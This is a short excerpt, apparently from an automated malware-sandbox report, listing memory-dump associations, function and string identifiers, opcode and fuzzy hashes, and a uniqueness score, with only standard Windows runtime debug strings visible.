                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                              • API String ID: 885266447-3903918235
                                                              • Opcode ID: 87767164ef511f9fb987b05dfaca056f56eba3f3c4bd6b43d82aa3a8c4866816
                                                              • Instruction ID: 50fa89f3c69d00c2c6950450dce0eaed28d2620b3bcb1fefd2370c6a26b9a627
                                                              • Opcode Fuzzy Hash: 87767164ef511f9fb987b05dfaca056f56eba3f3c4bd6b43d82aa3a8c4866816
                                                              • Instruction Fuzzy Hash: FEF0F672240211BFE6252A45DD02F33BF6BEB44B30F140358F628561E1EAA2FC20E6F4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%